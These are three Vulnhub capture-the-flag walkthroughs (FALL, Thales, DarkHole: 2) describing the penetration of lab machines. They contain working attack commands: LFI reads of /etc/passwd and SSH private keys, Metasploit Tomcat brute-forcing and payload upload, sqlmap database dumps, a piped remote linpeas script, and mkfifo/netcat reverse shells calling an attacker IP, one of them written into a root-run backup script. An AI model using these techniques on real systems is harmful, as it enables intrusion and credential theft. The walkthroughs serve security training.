digital world.local: FALL Vulnhub Walkthrough

FALL (digitalworld.local: FALL) is a medium level machine created by Donavan for Vulnhub. This lab is appropriate for some experienced CTF players who wish to put their skills to the test in these environments. So, let's get going and figure out where to break things down into manageable pieces.

Pentest Methodology

Network Scanning

●       nmap

Enumeration

●       Abusing HTTP

●       gobuster

Exploitation

●       Fuzzing

●       Abusing LFI

●       Enumerate id_rsa key

Privilege Escalation

●       SSH

●       Root Flag

Level: Medium

Network Scanning

To begin, netdiscover cannot be used to determine the IP address of a victim PC. When we start the machine on the screen, the machine displays its IP address.

In our scenario, the IP address of the victim PC is 192.168.1.7.

 

To move forward in this procedure, we are launching Nmap. We ran an aggressive scan (-A) for open port enumeration and found the following ports as show in the given image.

 

nmap -A 192.168.1.7

 

According to the results of the nmap scan, this machine is running a wide range of services.

 

Enumeration

 

First, we'll attempt to use HTTP. Let's look at port 80 and see if anything notable comes up. We can instantly verify this in the browser because the Apache Server is listening on port 80. There is nothing special except that we discovered a user name "qiu".

 

Now, we're going to try gobuster to see if we can locate something that will allow us to progress forward in this machine. It is a program that is used to brute-force URIs (directories and files) in web sites, DNS subdomains (with wildcard support), and Virtual Host names on target web servers.

Read more from here

 

gobuster dir -u http://192.168.1.7 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .html,.php,.txt

 

Above command will enumerate all file that has .html, .php, .txt extension.

 

We discovered a trustworthy directory (test.php). I immediately went to the browser to examine that. As stated, when we access /test.php, and receive an alert. It claims that a GET parameter is missing. As a result, we now have only a few possibilities.

 

 

 

Exploitation

I was clueless therefor I was doubtful with LFI thus I use FUZZ to identify existence of LFI by fuzzing for /etc/passwd file. With the help of following command I try to fuzz for missing Get parameter.

ffuf -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u 'http://192.168.1.7/test.php?FUZZ=/etc/passwd' -fs 80

 

 

We got 200 OK for “file” parameter that could be missing term. We use curl command to bring up /etc/passwd file of the remote machine.

 

curl http://192.168.1.7/test.php?file=/etc/passwd

 

 

We can easily see that the user name "qiu" who has user account with higher privileges, and it also has bash authorization.

 

It's time to begin the process of LFI exploitation. After exploring the directory, we enumerated an ssh id_rsa key for user qiu with the help of curl command by exploiting LFI.

 

curl http://192.168.1.7/test.php?file=/home/qiu/.ssh/id_rsa

 

 

Let's try the SSH connection but first, we must save this key on our machine while granting the necessary permissions. So, let us begin the SSH login…

 

nano sshkey

chmod 600 sshkey

ssh -i sshkey qiu@192.168.1.7

 

After successfully logging in to SSH, we began for privilege escalation.

Privilege Escalation

All we have to do now is examine bash history and find some valuable information.

cat .bash_history

We obtained the user "qiu" password "remarkablyawesome," and we ran a sudo command to check this user's permissions.

sudo -l

The user "qiu" was granted all of the necessary permissions to become root. We simply switch the user account and submit the password enumerated above.

Hooray!! Now that we have the root, we must navigate to the root directory in order to obtain the root flag.

sudo su

cat proof.txt

This is how we can get to the heart of the machine. It was a fantastic exercise, and it was a lot of fun to root for. It is necessary to try one in order to comprehend various scenarios.

 

Author: Shubham Sharma is a passionate Cybersecurity Researcher, contact LinkedIn and Twitter.

Thales1 Vulnhub Walkthrough

"Thales" is a Capture the Flag challenge available on Vulnhub. MachineBoy deserves credit for developing this box. In this box, we will learn how to exploit a vulnerability in the Tomcat Application Manager instance to gain access to the system and we will also learn how to exploit a script running with root privileges to gain root access. So, let us see how to solve this machine in the proper steps.

Download Thales from here

Level: Easy (For Beginners)

Methodology:

Network scanning

·         netdiscover

·         Nmap

Enumeration

·         Abusing HTTP

Exploitation

·         Metasploit

·         John the Ripper

Privilege Escalation

·         Reverse shell script

·         Capture the Flag

 

Network Scanning

Initially, we will scan the network to find the Victim machine IP using the netdiscover command.

netdiscover

 

We find that the Victim machine has the IP address as 192.168.1.175

 

Nmap

Further, we ran an aggressive scan (-A) for open port enumeration where we found the following port details:

nmap -A 192.168.1.175

According to the Nmap output, we get

·         on port 22 SSH server running (OpenSSH)

·         on port 8080 HTTP service running (Apache tomcat)

 

Enumeration

Abusing HTTP

Now let's see if we can get any interesting information from port 8080. Because the Apache Tomcat Server is running on port 8080, we can see the result right away in the browser.

We note the Tomcat version number: 9.0.52

URL: http://192.168.1.175:8080

 

Exploitation

Metasploit

Now, let’s start msfconsole. We will be using the auxiliary scanner to bruteforce tomcat manager login.

msfconsole -q

use auxiliary/scanner/http/tomcat_mgr_login

set rhosts 192.168.1.175

set username tomcat

set verbose false

exploit

as result the password of tomcat that we get is tomcat:role1

 

As we enumerated Tomcat Manager Login creds thus we can try reverse connection by injecting malicious Java payload. We will use this exploit to get a meterpreter shell.

use exploit/multi/http/tomcat_mgr_upload

set rhosts 192.168.1.175

set rport 8080

set httpusername tomcat

set httppassword role1

exploit

 

After getting the meterpreter shell we navigate to the ‘home’ directory and there we can find a sub-directory named ‘thales’. Entering the ‘thales’ directory we get two files: user.txt and notes.txt. We also find a .ssh directory.

cd /home

ls

cd thales

ls

We observe that the public key (id_rsa.pub) and the private key(id_rsa) are present on the victim machine. The private key is used to login. So now we proceed to download the private key onto our kali machine.

cd .ssh

ls

download id_rsa /root/Desktop

 

John the Ripper

Now, we need to convert the id_rsa key into a hash which can be cracked using ‘john’. First, we use the command ‘ssh2john’ to convert the key into a hash.

locate ssh2john

/usr/share/john/ssh2john.py id_rsa > sshhash

 

Now we can attempt to crack the hash with john the ripper. We will use the wordlist ‘rockyou.txt’.

john –wordlist=/usr/share/wordlists/rockyou.txt sshash

 

Hash is cracked and we get the password: vodka06  

On a new tab, we ssh into the machine using the username: tomcat and password: role1

ssh tomcat@<victim_ip> 

 

 

After we get a shell, we will upgrade our non-interactive shell to a partially interactive one using the following command:

python -c 'import pty; pty.spawn("/bin/bash")'

Privilege Escalation

Reverse shell script  

Since we have cracked the password of user ‘thales’, let’s switch to the thales user.

su thales

 

After switching to thales user, we use the command “id” to know about the real and effective ‘user and group’ IDs. We find that thales is a non-root user.

 

We now use “ sudo -l “ to check which commands can be run as root by the user thales.

sudo -l

 

We find that user thales does not have the ability to run any command as root.

So now we navigate around in search of some interesting files.

 

We get a hint on note.txt that a backup script is prepared for us in the directory /usr/local/bin/backup.sh

 

Now, let’s go and check the backup.sh file. We investigate and find that this file has read, written, and execute permissions and the file is owned by the root.

cat /usr/local/bin/backup.sh

ls -la /usr/local/bin/backup.sh

 

’

 

So this means we can replace the script with a reverse shell and expect to get root shell access.

 

On our attacking machine ( kali ) we will start a Netcat listener to receive the shell, on port 8888

nc -lvp 8888

 

We proceed to replace the script in backup.sh with a reverse shell as shown below:

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.3 8888 >/tmp/f" >>backup.sh

 

As soon as we run the script backup.sh, we receive shell on our Netcat listener. As expected the shell we received is a root shell and in the end, we proceed to capture the root flag.  

Capture the root flag

Id

cd /root

ls

cat root.txt

DarkHole: 2 Vulnhub Walkthrough

DarkHole: 2 is a medium-hard machine created by Jihad Alqurashi for Vulnhub. This system is also put through its paces in VirtualBox. This lab is appropriate for certain experienced CTF players who want to test their talents in these settings. So, let's get started and figure out how to divide things down into small chunks.

 

Pentesting Methodology

 

Network Scanning

●        netdiscover

●        nmap

 

Enumeration

●        Abusing HTTP

●        gitdumper tool

 

Exploitation

●        SQL injection

●        ssh

 

Privilege Escalation

●        linpass.sh

●        Netcat reverse shell

●        User flag

●        bash history

●        Root flag

 

Level: Medium-Hard

 

Network Scanning

 

To begin, we must use the netdiscover command to scan the network for the victim machine's IP address.

netdiscover

 

Our IP address is 192.168.1.179.

 

 

We are now initiating Nmap to advance in this process. We did an aggressive scan (-A) for open port enumeration and discovered the following ports information:

 

nmap -A 192.168.1.179

 

According to the Nmap output, we have

●        an SSH server running on port 22

●        an HTTP service running (Apache Server) on port 80, as well as an http-git page.

 

 

Enumeration

 

First, we'll try to utilize HTTP. Let's check port 80 to see if anything interesting comes up. Because the Apache Server is listening on port 80, we can immediately verify it in the browser.

 

Except for the login page, the site contains no useful information. So, we decided to have a sneak peek at the login page.

 

 

Then we decided to have a look at the http-git page that we discovered previously during the Nmap aggressive scan.

 

We've introduced a tool called gitdumper to improve the aesthetics of this http-git page. It is a tool for acquiring a git repository from a website to gain a better grasp of the data set.

We simply use the git clone function to install this.

 

git clone https://github.com/arthaud/git-dumper.git

cd git-dumper

 

After downloading the tool, we attempt to run it with python.

Another thing we must do is offer them a directory name in which to save these git logs (in our case we named this as a backup for this http-git page).

 

mkdir backup

python3 git_dumper.py http://192.168.1.179/.git/ backup

 

 

After that, we accessed the backup directory, and the log file had three entries. Using git, we opened one of the entries to progress in this lab.

 

cd backup

git log

git diff a4d900a8d85e8938d3601f3cef113ee293028e10

 

Finally, we discovered the login page credentials discovered before during http abuse.

 

Email: lush@admin.com

Password: 321

 

 

Exploitation

We were directed to a strange page after checking in on that page, which we thought was suitable for SQL injection-related tactics.

 

So, we used a burp suite to gather this page's cookies. It will be advantageous for our SQL injection strategy.

 

 

These cookies were saved in a file called "sql" using the nano command. We initiated a sqlmap attack using this file, requesting the databases.

 

nano sql

sqlmap -r sql --dbs --batch

 

 

We obtained a few databases in a matter of minutes. So, we initiated another command (using the -D parameter) for dumping the database named darkhole_2.

 

sqlmap -r sql -D darkhole_2 --dump-all --batch

 

 

In a matter of moments, we discovered ssh credentials for the user Jehad in this dump database.

 

User: jehad

Pass: fool

 

 

Now, using these ssh credentials, we logged in with the user Jehad and opened its id to authenticate it.

 

ssh jehad@192.168.1.179

id

 

 

Privilege Escalation

It's time to start the privilege escalation process. We switched to the tmp folder and tried to run the Linpeas script with curl. This is a script that searches for potential paths to elevate privileges on Linux hosts and highlights them for a better understanding of those instances with potential exploits.

 

curl https://raw.githubusercontent.com/carlospalop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh

 

 

After running it, we saw that a PHP page for the user Losy was available on localhost port 9999. As a result, we've devised a plan to use local port forwarding to go to that page.

 

First, we went to the previously mentioned directory and discovered an index.php file. This tells us that we can get a command prompt (cmd) by using the previously discussed local port forwarding method for the user losy.

 

cd /opt/web

cat index.php

 

It is now time to launch this assault. We attempt to login as the jehad user, using the details of local port forwarding provided in the above results we achieved.

 

ssh jehad@192.168.1.179 -L 9999:localhost:9999

 

 

Following that, we saw the user losy's command prompt in the web browser. We authenticate this by collecting this user's id.

 

http://127.0.0.1:9999/?cmd=id

 

Privilege Escalation

Using a netcat reverse shell on this browser as this user's cmd. We attempted a standard methods command, but it did not work in this circumstance. So, we attempted this attack after encoding it using the burp suite decoder.

 

rm /tmpf;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.3:8888 >/tmp/f

 

 

After that, we used a web browser and opened a Netcat listener on the opposite side to catch the reverse shell.

 

nc -lvp 8888

python3 -c 'import pty; pty.spawn("/bin/bash")'

 

We obtained the user losy and the user flag of this lab after capturing the reverse shell.

We discovered the bash history of this lab in a folder, which can be quite beneficial in obtaining root.

 

cd /home/losy

cat user.txt

cat .bash_history

 

 

We discovered losy's login credentials in this bash history file.

 

losy: gang

 

Following that, we tested this user's sudo permissions. We discovered that we could reach the root using a python one-liner.

 

Now run this python one-liner with sudo and the losy credential.

sudo python3 -c 'import pty; pty.spawn("/bin/bash")'

 

Hurray!! We obtained the well as root flag. I must add that it was a great activity to complete, and I applaud the author for creating this lab.

 

cat root.txt